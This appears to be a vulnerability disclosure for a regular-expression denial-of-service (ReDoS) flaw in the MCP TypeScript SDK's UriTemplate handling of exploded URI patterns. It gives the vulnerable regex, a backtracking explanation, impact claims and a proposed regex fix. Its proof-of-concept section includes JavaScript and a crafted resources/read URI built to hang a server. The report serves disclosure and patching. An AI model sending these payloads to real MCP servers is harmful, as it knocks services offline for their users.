MCP TypeScript SDK UriTemplate ReDoS #965
Description
1. Describe the bug
The UriTemplate class in MCP TypeScript SDK is vulnerable to ReDoS attacks when processing RFC 6570 URI Template standard exploded array patterns ({/id*}, {?tags*}, etc.) due to catastrophic backtracking in the regular expression engine.
2. Root Cause Analysis
1. Vulnerable Code Location
File: typescript-sdk/src/shared/uriTemplate.ts
Function: partToRegExp() (Line 223-271)
Method: match() (Line 273-315)
2. Vulnerable Regular Expression Pattern
// Line 253: Regular expression generated for exploded patterns
pattern = part.exploded ? "([^/]+(?:,[^/]+)*)" : "([^/,]+)";
// ↑ This pattern is the source of ReDoS vulnerability3. Backtracking Mechanism
Regular Expression Analysis: ([^/]+(?:,[^/]+)*)
[^/]+: One or more characters that are not/(?:,[^/]+)*: Zero or more occurrences of,followed by one or more non-/characters- Problem: Nested quantifiers causing catastrophic backtracking
Backtracking Process:
Input: /users/user1,user2,user3,user4,user5FAIL/
1. [^/]+ matches "user1,user2,user3,user4,user5FAIL"
2. Entire pattern fails at the final "/" (due to $)
3. Backtrack: [^/]+ matches only "user1,user2,user3,user4,user5"
4. (?:,[^/]+)* tries to match "FAIL/" → fails (contains "/")
5. Further backtrack: [^/]+ matches only "user1,user2,user3,user4"
6. (?:,[^/]+)* tries to match ",user5FAIL/" → fails
7. This process continues for all possible combinations → exponential time complexity!
4. Attack Vector
Occurs in MCP Server's ReadResourceRequestSchema handler:
// typescript-sdk/src/server/mcp.ts:427-429
const variables = template.resourceTemplate.uriTemplate.match(
uri.toString(), // ← URI controlled by client
);Attack Scenario:
- Server registers resource template using exploded patterns
- Attacker sends malicious URI via
resources/readrequest - ReDoS occurs when server calls
uriTemplate.match()
3. Impact Analysis
1. Direct Impact
- Server DoS: 100% CPU usage causing server crash
- Service Unavailability: Other clients also affected
- Availability Degradation: Service interruption
2. Attack Prerequisites
- Server Side: Uses exploded patterns (
{/id*},{?tags*}, etc.) - Client Side: MCP client access permissions
- Network: Ability to send requests via MCP protocol
3. Scope of Impact
- MCP Servers: All servers using exploded patterns
- Clients: Malicious clients or victim clients
- Systems: All MCP servers in Node.js environments
4. Proof of Concept (POC)
1. Basic ReDoS Test
const { UriTemplate } = require('@modelcontextprotocol/sdk');
// Vulnerable template
const template = new UriTemplate('/users{/id*}');
// Malicious payload that triggers ReDoS
const maliciousPayload = '/users/' + 'user1,user2,user3,'.repeat(10) + 'userX/';
console.log('Starting ReDoS attack...');
console.time('Matching time');
// This call causes infinite loop
const result = template.match(maliciousPayload);
console.timeEnd('Matching time');
console.log('Result:', result);2. Real MCP Server Attack Scenario
// Server registers this template
server.registerResource(
"user-files",
new ResourceTemplate("file:///users{/id*}/files{/path*}", { list: undefined }),
{ title: "User Files" },
async (uri, variables, extra) => { /* ... */ }
);
// Attacker sends this request
client.readResource({
uri: "file:///users/user1,user2,user3,user4,user5,user6,user7,suer8,user,9,user10,user11,user12,user13,user14,user16,user17,user18,user19,user20,FAIL/files/path1,path2,path3FAIL/"
});
// ↑ ReDoS occurs on server!3. Performance Test Results
| Payload Type | Processing Time | Result |
|---|---|---|
| Normal Input | < 1ms | Normal |
| Malicious Input (10 repeats) | 58 seconds | ReDoS |
| Malicious Input (50 repeats) | Infinite loop | Server crash |
5. Mitigation Strategies
1. Immediate Applicable Solutions
Fix Regular Expression Pattern:
// Current (vulnerable)
pattern = "([^/]+(?:,[^/]+)*)";
// Fixed (safe)
pattern = "([^/,]+(?:,[^/,]+)*)";6. Technical Details
1. Affected Versions
- MCP TypeScript SDK: All versions (to date)
- Node.js: All versions
- Platform: All platforms
2. Non-affected Patterns
- Single variables:
{id},{path} - Single queries:
?q={query} - Regular paths:
/users/{id}
3. Affected Patterns
- Exploded arrays:
{/id*},{?tags*} - Complex exploded:
{/path*}{?filter*} - Nested exploded:
/api{/version*}/users{/id*}
7. Conclusion
This ReDoS vulnerability poses a serious security risk and requires immediate patching.
Key Points:
- Vulnerability Confirmed: Proven with actual POC
- Scope of Impact: All servers using exploded patterns
- Attack Feasibility: ReDoS attacks via MCP clients
- Solvable: Fixable by modifying regular expression patterns
Impact
Business Impact
- Service Availability Degradation: Users cannot access services
- Trust Damage: Customer churn due to server instability
- Operational Cost Increase: Server restart and recovery operations required
Real Attack Examples - Web Applications: Attack MCP-based web services
- API Servers: Crash MCP-based API servers